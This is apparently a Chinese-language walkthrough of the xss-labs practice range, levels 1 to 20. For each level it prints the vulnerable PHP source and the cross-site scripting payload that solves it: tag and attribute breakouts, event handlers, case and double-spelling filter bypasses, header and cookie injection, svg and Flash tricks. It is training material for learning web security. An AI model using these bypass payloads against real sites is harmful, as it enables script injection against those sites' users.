xss靶场

xss-labs下载地址：GitHub - do0dl3/xss-labs: xss 跨站漏洞平台

xss常见触发标签：XSS跨站脚本攻击实例与防御策略-CSDN博客

level-1

首先查看网页的源代码发现get传参的name的值test插入了html里头，还回显了payload的长度。

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<h2 align=center>欢迎用户test</h2><center><img src=level1.png></center>//test在这里回显
<h3 align=center>payload的长度:4</h3></body>
</html>

输入：?name=<script>alert()</script>即可。//alert：js弹窗函数。

查看一下源代码：

//没有过滤，直接传参触发xss即可
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];//产参输入
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

level-2

和第一关一样，先注入一下试试：<script>alert()</script>，没有成功，查看页面源代码。

可以看到，第一个的特殊符号尖括号被实体化了，但是第二个没有。不过第二个被双引号闭合起来了，语句没有被执行，那么闭合两侧的双引号和尖括号即可。

输入："><script>alert()</script><"

查看一下源代码：

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];        //下面这个htmlspcialchars()函数将参数给实体化了
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

level-3

和之前一样输入：<script>alert()</script>，没有成功，查看页面源代码。

可以看到，两个地方都被实体化了。查看源代码，发现都是htmlspcialchars()函数进行的实体化，而此函数只是对尖括号进行实体化，所以我们可以使用onfocus事件绕过，代码中是用的单引号，所以需要单引号闭合。

onfocus事件：onfocus事件在元素获得焦点时触发，最常与 <input>、<select> 和 <a> 标签一起使用，简单来说，onfocus事件就是当输入框被点击的时候，就会触发myFunction()函数，然后我们再配合javascript伪协议来执行js代码。

输入：' onfocus=javascript:alert() '

输入完成后没有弹窗，再次点击一下输入框就可以触发。

level-4

查看页面源代码，发现这关用的是双引号。依然可以使用onfocus进行绕过。

输入：" onfocus=javascript:alert() "

查看一下源代码：

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level5.php?keyword=find a way out!"; 
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);//本行和下一行的代码将两个尖括号删除了。
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

level-5

首先输入" onfocus=javascript:alert() "，查看页面源代码。

我们输入的on变成了o_n，这就过滤了onfocus方法。

查看一下源代码。

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level6.php?keyword=break it out!"; 
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);//将字母转化为小写。
$str2=str_replace("<script","<scr_ipt",$str);//过滤了script
$str3=str_replace("on","o_n",$str2);//过滤了onfocus
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

有转化字母为小写的函数，所以，我们无法使用大小写绕过。这里我们使用a href方法。

a href方法：href的属性是 当<a>被点击时，会执行触发跳转。那么我们就可以触发执行一段js代码或者一段链接，这里插入一段js代码。

输入："> <a href=javascript:alert()>xxx</a> <"

输入完成后点击xxx链接即可。

level-6

查看页面源代码，没有发现过滤了什么，输入关键词看看：onfocus <script> <a href=javascript:alert()>，再看源代码发现这几个都被过滤了。再加上大小写看看有没有被转化。输入：OnFocus <sCriPt> <a hReF=javascript:alert()>。

查看源代码：没有过滤大小写。

使用大小写绕过：

"> <sCript>alert()</sCript> <"
" Onfocus=javascript:alert() "
"> <a hRef=javascript:alert()>x</a> <" //三者选其一都可

查看源代码：

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level7.php?keyword=move up!"; 
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);//过滤script
$str3=str_replace("on","o_n",$str2);//过滤onfocus
$str4=str_replace("src","sr_c",$str3);//过滤src
$str5=str_replace("data","da_ta",$str4);//过滤data
$str6=str_replace("href","hr_ef",$str5);//过滤ghref
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

level-7

和之前一样，输入关键词看看效果：" OnFocus <sCriPt> <a hReF=javascript:alert()>

查看源代码看看结果：如图：大写变成了小写，on，script，href，script这些关键词被删了。

被删除了，那么就用双拼写绕过即可，例如oonn，中间的on被删掉后依然是on。

输入："> <a hrehreff=javasscriptcript:alert()>x</a> <"

level-8

本关看页面需要上传一个友情链接，先输入一个123看看，看到在input标签和href中有传到了输入的内容。

下来测试一下过滤情况，输入：" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>看一下结果。可以看到两个里面的尖括号和双引号都被实体化了。

这里需要使用到href的一个隐藏属性：href自动Unicode解码，我们可以插入一段js伪协议。

输入：javascript:alert()

使用在线工具进行Unicode编码，解码得：

javascript:alert()

输入后点击友情链接即可。

level-9

先输入关键词看看过滤情况：" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

没有插入成功，看下源代码。

当输入语句没有http://时，strpos函数会返回false和false相等，此时会执行if语句，因此我们需要输入中有http://但是要注释掉，以免影响执行其他语句。

输入：javascript:alert()/* http:// */

level-10

输入关键词看看过滤情况，" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

查看页面源代码发现全部被实体化了，查看源代码。

还有一个隐藏的传参t_sort，过滤掉了尖括号，使用onfocus事件，因为输入框被隐藏，所以添加type="text"。

输入:?t_sort=" onfocus=javascript:alert() type="text

输入完成点击输入框即可。

level-11

查看页面源代码

发现<input>标签里面四个值都做了隐藏，不过第四个名为t_ref的<input>标签是http头referer的参数（就是由啥地址转跳到这里的，http头的referer会记录有），使用get和post传参输入检查一下前三个，会发现都上传失败了，所以我们使用BP抓包添加http头。

输入：Referer: " onfocus=javascript:alert() type="text

输入后点击输入框即可。

level-12

查看源代码。

根据源代码，这是user-agent头，使用BP修改UA头即可。修改为：" onfocus=javascript:alert() type="text

level-13

查看页面源代码。

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level14.php"; 
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<h2 align=center>没有找到和good job!相关的结果.</h2><center>
<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_cook"  value="" type="hidden">//t_cook考虑到cookie值。
</form>
</center><center><img src=level13.png></center>
<h3 align=center>payload的长度:9</h3></body>
</html>

打开F12找到cookie值修改，这次使用" onclick=alert() type="text ，当然onfocus也可以：" onfocus=javacript:alert() type="text

level-14

本关是要跳转到一个网站，在那个网站进行注入，但是现在网站崩了，就没法打了，直接到15关。

level-15

ng-include指令就是文件包涵的意思，用来包涵外部的html文件，如果包涵的内容是地址，需要加引号

这里我们可以包含第一关，然后进行绕过。

输入：?src='/level1.php?name=<img src=1 onmouseover=alert()>'

level-16

可以看到，test被插入进了center标签中，故而不需要闭合，测试一下关键字：

?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> &#106; 

发现这里先是将字母小写化了，再把script替换成空格，最后将空格给实体化。/也被替换成了空格。使用<svg>标签。

输入：?keyword=<svg%0Aonload=alert(1)>

level-17

测试一下关键词发现使用了html转义，这里不需要闭合符号，传入的参数都出现在了embed标签上，打开后缀名为swf的文件（FLASH插件的文件，现在很多浏览器都不支持FLASH插件了）

embed标签：embed标签可以理解为定义了一个区域，可以放图片、视频、音频等内容，但是呢相对于他们，embed标签打开不了文件的时候就会没有显示的区域。

可以使用flash打开，如果不想下载，可以去源代码将xsfo01.swf改为index.png即可。

输入：?arg02= onclick=alert()

再点击一下图片即可。

level-18

和上一关一样，先改了一下后端的代码。只进行了实体化函数，和上一关基本一样。

输入：?arg02= onmousedown=alert()

level-19

最后几关都是flash xss。

输入：?arg01=version&arg02=<a href="javascript:alert()">here</a>

level-20

输入：?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123